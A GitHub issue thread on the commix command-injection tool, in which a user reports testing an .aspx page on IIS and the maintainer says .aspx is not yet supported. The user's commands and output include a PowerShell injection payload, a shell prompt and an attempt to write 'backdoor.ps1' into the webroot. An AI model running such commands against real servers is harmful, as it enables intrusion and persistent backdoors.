### ISSUE TITLE
Feature Request: ASP.NET

### ISSUE THREAD

**Issue by JohnnyAMD** [stasinopoulos/commix#29]
Hi there, 

Have a Windows Server with IIS 8.0 running. 

Did a test against a application hosted on and I used the following CLI:

"python commix.py --url="https://target/1.aspx?param=INJECT_HERE" --level=3"

Thus, I got a possible command injection per received message:
"
(*) Testing the file-based injection technique... [ SUCCEED ]
(!) The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
  (+) Type : Semiblind Command Injection
  (+) Technique : File-Based Injection Technique
  (+) Payload :  powershell.exe -InputFormat none Add-Content LMCVOT.txt LMCVOT
"
Going head, Commix offered me to open an os_shell which had the following options: 

"(?) Do you want a Pseudo-Terminal? [Y/n/q] > Y"

It opened a "commix(os_shell) >" console and I was quite impressed. However, I have tried couple of windows commands like ipconfig / dir, etc. Nothing worked. Even powershell equivalents but with the same negative result. 

Then I issued a help command to check out my options:

"
  Type '?' to get all the available options.
  Type 'set' to set a context-specific variable to a value.
  Type 'back' to move back from the current context.
  Type 'quit' (or use <Ctrl-C>) to quit commix.
  Type 'os_shell' to get into an operating system command shell.
  Type 'reverse_tcp' to get a reverse TCP connection.
"

Typed reverse_tcp but there is no help for available for this option as which parameters I do have to use or similar details. Bottom line, please, can you document this option a little more or at least gi'me some clues of how it has supposed to work. 

On the other hand I did another test using the following cli:

python commix.py --url="https://site/param=INJECT_HERE" --level=3 --file-write="/home/commix/backdoor.ps1" --file-dest="\inetpub\wwwroot\app\app00\backdoor.ps1"

The odd thing is commix apparently doesn't care about my custom payload. It used the same default txt payload. 

At the end of this particular test it said the same thing: 
"
(*) Testing the file-based injection technique... [ SUCCEED ]
(!) The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
  (+) Type : Semiblind Command Injection
  (+) Technique : File-Based Injection Technique
  (+) Payload :  powershell.exe -InputFormat none Add-Content AQLNMS.txt AQLNMS
"

Please advice. 

Cheers.

**Comment by stasinopoulos** [comment]
Hello @JohnnyAMD  and thanks for the issue. I suspect that the problem occurs due to the ".aspx" extension of the web-page and not the IIS itself. Currently commix does not support ".aspx" pages (it is already in my todo-list). I 've already tested commix against Microsoft-IIS/7.5 and PHP and it works fine.
